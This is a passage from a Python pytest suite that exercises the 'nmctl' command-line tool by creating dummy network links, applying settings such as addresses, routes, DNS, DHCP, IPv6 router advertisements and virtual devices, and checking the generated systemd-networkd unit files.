self.copy_yaml_file_to_netmanager_yaml_path('static-network.yaml')
subprocess.check_call(['nmctl', 'apply-yaml-config'])
assert(unit_exits('10-test99.network') == True)
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'DNS') == "8.8.8.8 192.168.0.1")
assert(parser.get('Network', 'NTP') == "8.8.8.1 192.168.0.2")
assert(parser.get('Address', 'Address') == '192.168.1.45/24')
assert(parser.get('Route', 'Gateway') == '192.168.1.1/24')
assert(parser.get('Route', 'GatewayOnlink') == 'yes')
@pytest.mark.skip(reason="skipping")
def test_network_static_route_configuration(self):
self.copy_yaml_file_to_netmanager_yaml_path('static-route-network.yaml')
subprocess.check_call(['nmctl', 'apply-yaml-config'])
assert(unit_exits('10-test99.network') == True)
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Address', 'Address') == '192.168.1.101/24')
assert(parser.get('Route', 'Gateway') == '9.0.0.1')
class TestKernelCommandLine:
def teardown_method(self):
remove_units_from_netword_unit_path()
@pytest.mark.skip(reason="skipping")
def test_network_kernel_command_line_ip_dhcp(self):
''' ip=<interface>:{dhcp|on|any|dhcp6|auto6} '''
subprocess.check_call(['nmctl', 'generate-config-from-cmdline', 'ip=test99:dhcp'])
assert(unit_exits('10-test99.network') == True)
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'DHCP') == 'ipv4')
@pytest.mark.skip(reason="skipping")
def test_network_kernel_command_line_multiple_ip_dhcp(self):
''' ip=<interface>:{dhcp|on|any|dhcp6|auto6} '''
subprocess.check_call(['nmctl', 'generate-config-from-cmdline', 'ip=test99:dhcp ip=test98:dhcp'])
assert(unit_exits('10-test99.network') == True)
assert(unit_exits('10-test98.network') == True)
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'DHCP') == 'ipv4')
parser.read(os.path.join(networkd_unit_file_path, '10-test98.network'))
assert(parser.get('Match', 'Name') == 'test98')
assert(parser.get('Network', 'DHCP') == 'ipv4')
@pytest.mark.skip(reason="skipping")
def test_network_kernel_command_line_ip_static(self):
''' ip=<client-IP>:[ <server-id>]:<gateway-IP>:<netmask>:<client_hostname>:<interface>:{none|off}'''
subprocess.check_call(['nmctl', 'generate-config-from-cmdline', 'ip=192.168.1.34::192.168.1.1:::test99:dhcp'])
assert(unit_exits('10-test99.network') == True)
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'DHCP') == 'ipv4')
assert(parser.get('Route', 'Gateway') == '192.168.1.1/32')
assert(parser.get('Address', 'Address') == '192.168.1.34')
class TestCLINetwork:
def setup_method(self):
link_remove('test99')
link_add_dummy('test99')
restart_networkd()
def teardown_method(self):
remove_units_from_netword_unit_path()
link_remove('test99')
def test_cli_set_mtu(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-mtu', 'test99', '1400'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Link', 'MTUBytes') == '1400')
def test_cli_set_mac(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-mac', 'test99', '00:0c:29:3a:bc:11'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Link', 'MACAddress') == '00:0c:29:3a:bc:11')
def test_cli_set_dhcp_type(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-dhcp-mode', 'test99', 'yes'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'DHCP') == 'yes')
def test_cli_set_dhcp_iaid(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-dhcp-mode', 'test99', 'ipv4'])
subprocess.check_call(['nmctl', 'set-dhcp-iaid', 'test99', '5555'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('DHCPv4', 'IAID') == '5555')
def test_cli_add_static_address(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'add-link-address', 'test99', 'address', '192.168.1.45/24', 'peer',
'192.168.1.46/24', 'dad', 'ipv4', 'scope', 'link', 'pref-lifetime', 'forever',
'prefix-route', 'yes', 'label', '3434'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Address', 'Address') == '192.168.1.45/24')
assert(parser.get('Address', 'Peer') == '192.168.1.46/24')
assert(parser.get('Address', 'Scope') == 'link')
assert(parser.get('Address', 'PreferredLifetime') == 'forever')
assert(parser.get('Address', 'AddPrefixRoute') == 'yes')
assert(parser.get('Address', 'DuplicateAddressDetection') == 'ipv4')
assert(parser.get('Address', 'Label') == '3434')
def test_cli_add_default_gateway(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'add-link-address', 'test99', 'address', '192.168.1.45/24', 'peer',
'192.168.1.46/24', 'dad', 'ipv4', 'scope', 'link', 'pref-lifetime', 'forever',
'prefix-route', 'yes', 'label', '3434'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Address', 'Address') == '192.168.1.45/24')
subprocess.check_call(['nmctl', 'add-default-gateway', 'test99', 'gw', '192.168.1.1', 'onlink', 'true'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Route', 'Gateway') == '192.168.1.1')
assert(parser.get('Route', 'GatewayOnLink') == 'yes')
def test_cli_add_route(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['nmctl', 'add-link-address', 'test99', 'address', '192.168.1.45/24', 'peer',
'192.168.1.46/24', 'dad', 'ipv4', 'scope', 'link', 'pref-lifetime', 'forever',
'prefix-route', 'yes', 'label', '3434'])
subprocess.check_call(['sleep', '5'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Address', 'Address') == '192.168.1.45/24')
subprocess.check_call(['nmctl', 'add-route', 'test99', 'gw', '192.168.1.1', 'dest', '192.168.1.2', 'metric', '111', 'scope',
'link', 'mtu', '1400', 'table', 'local', 'proto', 'static', 'type', 'unicast', 'onlink', 'yes', 'ipv6-pref',
'medium', 'src', '192.168.1.4'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Route', 'Destination') == '192.168.1.2')
assert(parser.get('Route', 'Gateway') == '192.168.1.1')
assert(parser.get('Route', 'GatewayOnLink') == 'yes')
assert(parser.get('Route', 'Metric') == '111')
assert(parser.get('Route', 'MTUBytes') == '1400')
assert(parser.get('Route', 'Protocol') == 'static')
assert(parser.get('Route', 'Scope') == 'link')
assert(parser.get('Route', 'Table') == 'local')
assert(parser.get('Route', 'IPv6Preference') == 'medium')
assert(parser.get('Route', 'Source') == '192.168.1.4')
def test_cli_add_routing_policy_rule(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'add-rule', 'test99', 'table', '10', 'to', '192.168.1.2/24', 'from', '192.168.1.3/24',
'oif', 'test99', 'iif', 'test99', 'tos','0x12'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('RoutingPolicyRule', 'Table') == '10')
assert(parser.get('RoutingPolicyRule', 'From') == '192.168.1.3/24')
assert(parser.get('RoutingPolicyRule', 'To') == '192.168.1.2/24')
assert(parser.get('RoutingPolicyRule', 'TypeOfService') == '0x12')
assert(parser.get('RoutingPolicyRule', 'OutgoingInterface') == 'test99')
assert(parser.get('RoutingPolicyRule', 'IncomingInterface') == 'test99')
def test_cli_add_dns(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '30'])
subprocess.check_call(['nmctl', 'add-dns', 'test99', '192.168.1.45', '192.168.1.46'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
def test_cli_add_domain(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'add-domain', 'test99', 'domain1', 'domain2'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'Domains') == 'domain2 domain1')
def test_cli_add_ntp(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'add-ntp', 'test99', '192.168.1.34', '192.168.1.45'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'NTP') == '192.168.1.45 192.168.1.34')
def test_cli_set_ntp(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-ntp', 'test99', '192.168.1.34', '192.168.1.45'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'NTP') == '192.168.1.45 192.168.1.34')
def test_cli_set_ip_v6_router_advertisement(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-ipv6acceptra', 'test99', 'yes'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'IPv6AcceptRA') == 'true')
def test_cli_set_link_local_addressing(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['nmctl', 'set-link-local-address', 'test99', 'yes'])
subprocess.check_call(['sleep', '5'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'LinkLocalAddressing') == 'true')
def test_cli_set_ipv4_link_local_route(self):
        assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-ipv4ll-route', 'test99', 'yes'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'IPv4LLRoute') == 'true')
def test_cli_set_llmnr(self):
        assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['nmctl', 'set-llmnr', 'test99', 'yes'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'LLMNR') == 'true')
def test_cli_set_multicast_dns(self):
        assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-multicast-dns', 'test99', 'yes'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'MulticastDNS') == 'true')
def test_cli_set_ip_masquerade(self):
        assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-ipmasquerade', 'test99', 'yes'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'IPMasquerade') == 'true')
def test_cli_set_dhcp4_client_identifier(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-dhcp4-client-identifier', 'test99', 'mac'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('DHCPv4', 'ClientIdentifier') == 'mac')
def test_cli_set_dhcp4_use_dns(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-dhcp4-use-dns', 'test99', 'yes'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('DHCPv4', 'UseDNS') == 'true')
def test_cli_set_dhcp4_use_mtu(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-dhcp4-use-mtu', 'test99', 'yes'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
def test_cli_set_dhcp4_use_domains(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-dhcp4-use-domains', 'test99', 'yes'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('DHCPv4', 'UseDomains') == 'true')
def test_cli_set_dhcp4_use_ntp(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-dhcp4-use-ntp', 'test99', 'yes'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('DHCPv4', 'UseNTP') == 'true')
def test_cli_set_dhcp4_use_routes(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['nmctl', 'set-dhcp4-use-routes', 'test99', 'yes'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('DHCPv4', 'UseRoutes') == 'true')
def test_cli_set_link_lldp(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-lldp', 'test99', 'yes'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'LLDP') == 'true')
def test_cli_set_link_emit_lldp(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['sleep', '5'])
subprocess.check_call(['nmctl', 'set-emit-lldp', 'test99', 'yes'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'EmitLLDP') == 'true')
class TestCLIDHCPv4Server:
def setup_method(self):
link_remove('test99')
link_add_dummy('test99')
restart_networkd()
def teardown_method(self):
remove_units_from_netword_unit_path()
link_remove('test99')
def test_cli_configure_dhcpv4_server(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['nmctl', 'add-dhcpv4-server', 'test99', 'pool-offset',
'10', 'pool-size', '20', 'default-lease-time', '100',
'max-lease-time', '200', 'emit-dns', 'yes', 'dns', '192.168.1.1',
'emit-router', 'yes'])
subprocess.check_call(['sleep', '3'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'DHCPServer') == 'yes')
assert(parser.get('DHCPServer', 'PoolOffset') == '10')
assert(parser.get('DHCPServer', 'PoolSize') == '20')
assert(parser.get('DHCPServer', 'DefaultLeaseTimeSec') == '100')
assert(parser.get('DHCPServer', 'MaxLeaseTimeSec') == '200')
assert(parser.get('DHCPServer', 'EmitDNS') == 'yes')
assert(parser.get('DHCPServer', 'DNS') == '192.168.1.1')
assert(parser.get('DHCPServer', 'EmitRouter') == 'yes')
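        # For reference (inferred from the asserts above): add-dhcpv4-server is
        # expected to render the unit roughly as
        #
        #   [Network]
        #   DHCPServer=yes
        #
        #   [DHCPServer]
        #   PoolOffset=10
        #   PoolSize=20
        #   DefaultLeaseTimeSec=100
        #   MaxLeaseTimeSec=200
        #   EmitDNS=yes
        #   DNS=192.168.1.1
        #   EmitRouter=yes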
class TestCLIIPv6RA:
def setup_method(self):
link_remove('test99')
link_add_dummy('test99')
restart_networkd()
def teardown_method(self):
remove_units_from_netword_unit_path()
link_remove('test99')
def test_cli_configure_ipv6ra(self):
assert(link_exits('test99') == True)
subprocess.check_call(['nmctl', 'set-link-mode', 'test99', 'yes'])
assert(unit_exits('10-test99.network') == True)
subprocess.check_call(['nmctl', 'add-ipv6ra', 'test99', 'prefix', '2002:da8:1:0::/64',
'pref-lifetime', '100', 'valid-lifetime', '200', 'assign', 'yes',
'managed', 'yes', 'emit-dns', 'yes', 'dns', '2002:da8:1:0::1',
'domain', 'test.com', 'emit-domain', 'yes', 'dns-lifetime', '100', 'router-pref', 'medium',
'route-prefix', '2001:db1:fff::/64', 'route-lifetime', '1000'])
subprocess.check_call(['sleep', '3'])
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'IPv6SendRA') == 'yes')
assert(parser.get('IPv6Prefix', 'Prefix') == '2002:da8:1::/64')
assert(parser.get('IPv6Prefix', 'PreferredLifetimeSec') == '100')
assert(parser.get('IPv6Prefix', 'ValidLifetimeSec') == '200')
assert(parser.get('IPv6SendRA', 'RouterPreference') == 'medium')
assert(parser.get('IPv6SendRA', 'DNS') == '2002:da8:1::1')
assert(parser.get('IPv6SendRA', 'EmitDNS') == 'yes')
assert(parser.get('IPv6SendRA', 'Assign') == 'yes')
assert(parser.get('IPv6SendRA', 'DNSLifetimeSec') == '100')
assert(parser.get('IPv6SendRA', 'Domains') == 'test.com')
assert(parser.get('IPv6RoutePrefix', 'LifetimeSec') == '1000')
assert(parser.get('IPv6RoutePrefix', 'Route') == '2001:db1:fff::/64')
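        # For reference (inferred from the asserts above): a single add-ipv6ra call
        # fans out into three sections of the .network file, roughly
        #
        #   [Network]        IPv6SendRA=yes
        #   [IPv6SendRA]     RouterPreference=medium, EmitDNS=yes, DNS=2002:da8:1::1,
        #                    Assign=yes, DNSLifetimeSec=100, Domains=test.com
        #   [IPv6Prefix]     Prefix=2002:da8:1::/64, PreferredLifetimeSec=100,
        #                    ValidLifetimeSec=200
        #   [IPv6RoutePrefix] Route=2001:db1:fff::/64, LifetimeSec=1000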
class TestCLINetDev:
def setup_method(self):
link_remove('test98')
link_add_dummy('test98')
restart_networkd()
def teardown_method(self):
remove_units_from_netword_unit_path()
link_remove('test98')
def test_cli_create_vlan(self):
assert(link_exits('test98') == True)
subprocess.check_call(['nmctl', 'create-vlan', 'vlan-98', 'dev', 'test98', 'id', '11'])
assert(unit_exits('10-test98.network') == True)
assert(unit_exits('10-vlan-98.netdev') == True)
assert(unit_exits('10-vlan-98.network') == True)
restart_networkd()
subprocess.check_call(['sleep', '15'])
assert(link_exits('vlan-98') == True)
vlan_parser = configparser.ConfigParser()
vlan_parser.read(os.path.join(networkd_unit_file_path, '10-vlan-98.netdev'))
assert(vlan_parser.get('NetDev', 'Name') == 'vlan-98')
assert(vlan_parser.get('NetDev', 'kind') == 'vlan')
assert(vlan_parser.get('VLAN', 'id') == '11')
vlan_network_parser = configparser.ConfigParser()
vlan_network_parser.read(os.path.join(networkd_unit_file_path, '10-vlan-98.network'))
assert(vlan_network_parser.get('Match', 'Name') == 'vlan-98')
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test98.network'))
assert(parser.get('Match', 'Name') == 'test98')
assert(parser.get('Network', 'VLAN') == 'vlan-98')
link_remove('vlan-98')
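        # For reference (inferred from the asserts above; option names are shown with
        # the usual systemd capitalisation, which configparser matches case-insensitively):
        #
        #   10-vlan-98.netdev:  [NetDev] Name=vlan-98, Kind=vlan   [VLAN] Id=11
        #   10-test98.network:  [Match] Name=test98                [Network] VLAN=vlan-98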
def test_cli_create_macvlan(self):
assert(link_exits('test98') == True)
subprocess.check_call(['nmctl', 'create-macvlan', 'macvlan-98', 'dev', 'test98', 'mode', 'private'])
assert(unit_exits('10-macvlan-98.netdev') == True)
assert(unit_exits('10-macvlan-98.network') == True)
assert(unit_exits('10-test98.network') == True)
restart_networkd()
subprocess.check_call(['sleep', '3'])
assert(link_exits('macvlan-98') == True)
macvlan_parser = configparser.ConfigParser()
macvlan_parser.read(os.path.join(networkd_unit_file_path, '10-macvlan-98.netdev'))
assert(macvlan_parser.get('NetDev', 'Name') == 'macvlan-98')
assert(macvlan_parser.get('NetDev', 'kind') == 'macvlan')
assert(macvlan_parser.get('MACVLAN', 'Mode') == 'private')
macvlan_network_parser = configparser.ConfigParser()
macvlan_network_parser.read(os.path.join(networkd_unit_file_path, '10-macvlan-98.network'))
assert(macvlan_network_parser.get('Match', 'Name') == 'macvlan-98')
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test98.network'))
assert(parser.get('Match', 'Name') == 'test98')
assert(parser.get('Network', 'MACVLAN') == 'macvlan-98')
link_remove('macvlan-98')
def test_cli_create_macvtap(self):
assert(link_exits('test98') == True)
subprocess.check_call(['nmctl', 'create-macvtap', 'macvtap-98', 'dev', 'test98', 'mode', 'private'])
assert(unit_exits('10-macvtap-98.netdev') == True)
assert(unit_exits('10-macvtap-98.network') == True)
assert(unit_exits('10-test98.network') == True)
restart_networkd()
subprocess.check_call(['sleep', '3'])
assert(link_exits('macvtap-98') == True)
macvlan_parser = configparser.ConfigParser()
macvlan_parser.read(os.path.join(networkd_unit_file_path, '10-macvtap-98.netdev'))
assert(macvlan_parser.get('NetDev', 'Name') == 'macvtap-98')
assert(macvlan_parser.get('NetDev', 'kind') == 'macvtap')
assert(macvlan_parser.get('MACVTAP', 'Mode') == 'private')
macvlan_network_parser = configparser.ConfigParser()
macvlan_network_parser.read(os.path.join(networkd_unit_file_path, '10-macvtap-98.network'))
assert(macvlan_network_parser.get('Match', 'Name') == 'macvtap-98')
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test98.network'))
assert(parser.get('Match', 'Name') == 'test98')
assert(parser.get('Network', 'MACVTAP') == 'macvtap-98')
link_remove('macvtap-98')
def test_cli_create_ipvlan(self):
assert(link_exits('test98') == True)
subprocess.check_call(['nmctl', 'create-ipvlan', 'ipvlan-98', 'dev', 'test98', 'mode', 'l2'])
assert(unit_exits('10-ipvlan-98.netdev') == True)
assert(unit_exits('10-ipvlan-98.network') == True)
assert(unit_exits('10-test98.network') == True)
restart_networkd()
subprocess.check_call(['sleep', '3'])
assert(link_exits('ipvlan-98') == True)
ipvlan_parser = configparser.ConfigParser()
ipvlan_parser.read(os.path.join(networkd_unit_file_path, '10-ipvlan-98.netdev'))
assert(ipvlan_parser.get('NetDev', 'Name') == 'ipvlan-98')
assert(ipvlan_parser.get('NetDev', 'kind') == 'ipvlan')
assert(ipvlan_parser.get('IPVLAN', 'Mode') == 'L2')
ipvlan_network_parser = configparser.ConfigParser()
ipvlan_network_parser.read(os.path.join(networkd_unit_file_path, '10-ipvlan-98.network'))
assert(ipvlan_network_parser.get('Match', 'Name') == 'ipvlan-98')
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test98.network'))
assert(parser.get('Match', 'Name') == 'test98')
assert(parser.get('Network', 'IPVLAN') == 'ipvlan-98')
link_remove('ipvlan-98')
def test_cli_create_ipvtap(self):
assert(link_exits('test98') == True)
subprocess.check_call(['nmctl', 'create-ipvtap', 'ipvtap-98', 'dev', 'test98', 'mode', 'l2'])
assert(unit_exits('10-ipvtap-98.netdev') == True)
assert(unit_exits('10-ipvtap-98.network') == True)
assert(unit_exits('10-test98.network') == True)
restart_networkd()
subprocess.check_call(['sleep', '3'])
assert(link_exits('ipvtap-98') == True)
ipvtap_parser = configparser.ConfigParser()
ipvtap_parser.read(os.path.join(networkd_unit_file_path, '10-ipvtap-98.netdev'))
assert(ipvtap_parser.get('NetDev', 'Name') == 'ipvtap-98')
assert(ipvtap_parser.get('NetDev', 'kind') == 'ipvtap')
assert(ipvtap_parser.get('IPVTAP', 'Mode') == 'L2')
ipvtap_network_parser = configparser.ConfigParser()
ipvtap_network_parser.read(os.path.join(networkd_unit_file_path, '10-ipvtap-98.network'))
assert(ipvtap_network_parser.get('Match', 'Name') == 'ipvtap-98')
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test98.network'))
assert(parser.get('Match', 'Name') == 'test98')
assert(parser.get('Network', 'IPVTAP') == 'ipvtap-98')
link_remove('ipvtap-98')
@pytest.mark.skip(reason="skipping")
def test_cli_create_vrf(self):
subprocess.check_call(['nmctl', 'create-vrf', 'vrf-98', 'table', '11'])
assert(unit_exits('10-vrf-98.netdev') == True)
assert(unit_exits('10-vrf-98.network') == True)
restart_networkd()
subprocess.check_call(['sleep', '3'])
assert(link_exits('vrf-98') == True)
vrf_parser = configparser.ConfigParser()
vrf_parser.read(os.path.join(networkd_unit_file_path, '10-vrf-98.netdev'))
assert(vrf_parser.get('NetDev', 'Name') == 'vrf-98')
assert(vrf_parser.get('NetDev', 'kind') == 'vrf')
assert(vrf_parser.get('VRF', 'Table') == '11')
vrf_network_parser = configparser.ConfigParser()
vrf_network_parser.read(os.path.join(networkd_unit_file_path, '10-vrf-98.network'))
assert(vrf_network_parser.get('Match', 'Name') == 'vrf-98')
link_remove('vrf-98')
def test_cli_create_veth(self):
subprocess.check_call(['nmctl', 'create-veth', 'veth-98', 'peer', 'veth-99'])
assert(unit_exits('10-veth-98.netdev') == True)
assert(unit_exits('10-veth-98.network') == True)
restart_networkd()
subprocess.check_call(['sleep', '3'])
assert(link_exits('veth-98') == True)
assert(link_exits('veth-99') == True)
vrf_parser = configparser.ConfigParser()
